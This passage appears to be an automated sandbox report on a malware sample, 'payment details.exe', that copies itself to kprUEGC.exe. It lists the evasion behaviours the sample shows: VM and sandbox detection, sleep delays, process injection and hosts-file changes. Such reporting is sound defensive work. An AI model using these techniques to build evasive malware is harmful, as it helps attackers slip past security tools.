                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: Process Memory Space: payment details.exe PID: 7008, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: kprUEGC.exe PID: 6692, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: kprUEGC.exe PID: 7132, type: MEMORY
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\payment details.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\payment details.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: payment details.exe, 00000000.00000002.699002431.0000000007F0C000.00000004.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.809737744.00000000074CC000.00000004.00000001.sdmp, kprUEGC.exe, 00000010.00000002.828189667.0000000007A4D000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: payment details.exe, 00000000.00000002.699002431.0000000007F0C000.00000004.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.809737744.00000000074CC000.00000004.00000001.sdmp, kprUEGC.exe, 00000010.00000002.828189667.0000000007A4D000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\payment details.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeWindow / User API: threadDelayed 3012Jump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeWindow / User API: threadDelayed 6814Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWindow / User API: threadDelayed 1107Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWindow / User API: threadDelayed 8741Jump to behavior
                      Source: C:\Users\user\Desktop\payment details.exe TID: 7012Thread sleep time: -31500s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exe TID: 7028Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exe TID: 6712Thread sleep count: 32 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\payment details.exe TID: 6712Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exe TID: 6784Thread sleep count: 3012 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\payment details.exe TID: 6784Thread sleep count: 6814 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 6688Thread sleep time: -31500s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 6716Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 7128Thread sleep time: -31500s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 6760Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 5508Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 5396Thread sleep count: 201 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 5396Thread sleep count: 197 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 1284Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 1868Thread sleep count: 1107 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 1868Thread sleep count: 8741 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\payment details.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\payment details.exeThread delayed: delay time: 31500Jump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 31500Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 31500Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: kprUEGC.exe, 00000010.00000002.828189667.0000000007A4D000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                      Source: kprUEGC.exe, 00000010.00000002.828189667.0000000007A4D000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: kprUEGC.exe, 00000010.00000002.828189667.0000000007A4D000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: kprUEGC.exe, 00000010.00000002.828189667.0000000007A4D000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: kprUEGC.exe, 00000010.00000002.828189667.0000000007A4D000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: kprUEGC.exe, 00000010.00000002.828189667.0000000007A4D000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: kprUEGC.exe, 00000010.00000002.828189667.0000000007A4D000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                      Source: kprUEGC.exe, 00000010.00000002.828189667.0000000007A4D000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: kprUEGC.exe, 00000010.00000002.828189667.0000000007A4D000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                      Source: payment details.exe, 00000005.00000002.927992446.00000000062B0000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\payment details.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\payment details.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      .NET source code references suspicious native API functionsShow sources
                      Source: payment details.exe, ImageManager/PInvoke/WinApi.csReference to suspicious API methods: ('InternalLoadLibraryW', 'LoadLibraryW@kernel32.dll'), ('InternalGetProcAddress', 'GetProcAddress@kernel32.dll')
                      Source: 0.2.payment details.exe.800000.0.unpack, ImageManager/PInvoke/WinApi.csReference to suspicious API methods: ('InternalLoadLibraryW', 'LoadLibraryW@kernel32.dll'), ('InternalGetProcAddress', 'GetProcAddress@kernel32.dll')
                      Source: 0.0.payment details.exe.800000.0.unpack, ImageManager/PInvoke/WinApi.csReference to suspicious API methods: ('InternalLoadLibraryW', 'LoadLibraryW@kernel32.dll'), ('InternalGetProcAddress', 'GetProcAddress@kernel32.dll')
                      Source: kprUEGC.exe.5.dr, ImageManager/PInvoke/WinApi.csReference to suspicious API methods: ('InternalLoadLibraryW', 'LoadLibraryW@kernel32.dll'), ('InternalGetProcAddress', 'GetProcAddress@kernel32.dll')
                      Source: 5.2.payment details.exe.400000.0.unpack, A/b2.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                      Source: 5.2.payment details.exe.620000.1.unpack, ImageManager/PInvoke/WinApi.csReference to suspicious API methods: ('InternalLoadLibraryW', 'LoadLibraryW@kernel32.dll'), ('InternalGetProcAddress', 'GetProcAddress@kernel32.dll')
                      Source: 5.0.payment details.exe.620000.0.unpack, ImageManager/PInvoke/WinApi.csReference to suspicious API methods: ('InternalLoadLibraryW', 'LoadLibraryW@kernel32.dll'), ('InternalGetProcAddress', 'GetProcAddress@kernel32.dll')
                      Source: 15.0.kprUEGC.exe.3c0000.0.unpack, ImageManager/PInvoke/WinApi.csReference to suspicious API methods: ('InternalLoadLibraryW', 'LoadLibraryW@kernel32.dll'), ('InternalGetProcAddress', 'GetProcAddress@kernel32.dll')
                      Source: 15.2.kprUEGC.exe.3c0000.0.unpack, ImageManager/PInvoke/WinApi.csReference to suspicious API methods: ('InternalLoadLibraryW', 'LoadLibraryW@kernel32.dll'), ('InternalGetProcAddress', 'GetProcAddress@kernel32.dll')
                      Source: 16.2.kprUEGC.exe.7f0000.0.unpack, ImageManager/PInvoke/WinApi.csReference to suspicious API methods: ('InternalLoadLibraryW', 'LoadLibraryW@kernel32.dll'), ('InternalGetProcAddress', 'GetProcAddress@kernel32.dll')
                      Source: 16.0.kprUEGC.exe.7f0000.0.unpack, ImageManager/PInvoke/WinApi.csReference to suspicious API methods: ('InternalLoadLibraryW', 'LoadLibraryW@kernel32.dll'), ('InternalGetProcAddress', 'GetProcAddress@kernel32.dll')
                      Source: 18.2.kprUEGC.exe.c40000.1.unpack, ImageManager/PInvoke/WinApi.csReference to suspicious API methods: ('InternalLoadLibraryW', 'LoadLibraryW@kernel32.dll'), ('InternalGetProcAddress', 'GetProcAddress@kernel32.dll')
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\payment details.exeMemory written: C:\Users\user\Desktop\payment details.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeMemory written: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeMemory written: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe base: 400000 value starts with: 4D5AJump to behavior
                      Modifies the hosts fileShow sources
                      Source: C:\Users\user\Desktop\payment details.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeProcess created: C:\Users\user\Desktop\payment details.exe {path}Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe {path}Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe {path}Jump to behavior
                      Source: payment details.exe, 00000005.00000002.920110142.00000000013D0000.00000002.00000001.sdmp, kprUEGC.exe, 00000013.00000002.918921239.0000000001BF0000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: payment details.exe, 00000005.00000002.920110142.00000000013D0000.00000002.00000001.sdmp, kprUEGC.exe, 00000013.00000002.918921239.0000000001BF0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: payment details.exe, 00000005.00000002.920110142.00000000013D0000.00000002.00000001.sdmp, kprUEGC.exe, 00000013.00000002.918921239.0000000001BF0000.00000002.00000001.sdmpBinary or memory string: Progman
                      Source: payment details.exe, 00000005.00000002.920110142.00000000013D0000.00000002.00000001.sdmp, kprUEGC.exe, 00000013.00000002.918921239.0000000001BF0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Users\user\Desktop\payment details.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
